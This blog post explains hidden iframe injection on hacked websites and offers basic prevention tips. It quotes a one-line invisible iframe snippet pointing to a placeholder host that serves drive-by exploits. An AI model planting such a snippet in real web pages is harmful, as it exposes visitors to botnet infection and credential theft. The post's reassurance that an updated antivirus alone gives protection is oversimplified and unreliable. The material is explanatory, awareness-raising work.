[Description]
You can find it almost anywhere, it is small and can hardly be seen :)
You can encounter it even on websites that are supposed to be clean because malicious people are using all kinds of exploits for known platforms in order to successfully append a small piece of code to a certain web page.
In order to understand it better, let me show you how it appears:
iframe src='http://IP/path/index.php' width='1' height='1' style='visibility: hidden
(other variants are the same, there are different atributes, sources, etc.. but they have the same behaviour)
As you can see, it isn't something extraordinary, just one line of code.. but let's see what it does.
First it will create an invisible frame that points to a certain website. Usually that website is a fake one or a real one that was hacked.
Now, the content that is received from that IP it is malicious. It can be an exploit, for example a specially crafted image that when is rendered it will trigger a buffer overflow and arbitrary code will be executed. This has the potential to take over the entire machine and add it to a very large botnet.
A botnet is a network of zombie computers that have the purpose to serve a malicious person. They can send spam, attack other computer causing a Denial Of Service, etc...
Also, it can add a keylogger in order to gather passwords, credit card numbers and other confidential informations.
Their primary purpose is to gather money, so they will continue to do this and alot more in order to ensure that.
Now, as you can see, with just one line of code someone can have access to your entire system. It can even monitor your activity right now...
[Clean]
What you can do in order to prevent this.. hmm.. not much. If you are a regular user that don't want to do complicated things, then you can just have an antivirus installed and keep your computer updated.
If you are a person that cares very much about security then you can add a few more layers of protection, for example you can just use a virtual machine (VMWare, VirtualPC, etc..) in order to navigate on the internet.
But usually if you have a good antivirus installed and updated, then you can say that you are protected, but don't navigate on malicious websites :)
Still, if the antivirus warns you about it, then usually all you have to do is to delete the infected file (this can be achieved by deleting the temporary internet files, or the cache, it depends on your browser).
No comments:
Post a Comment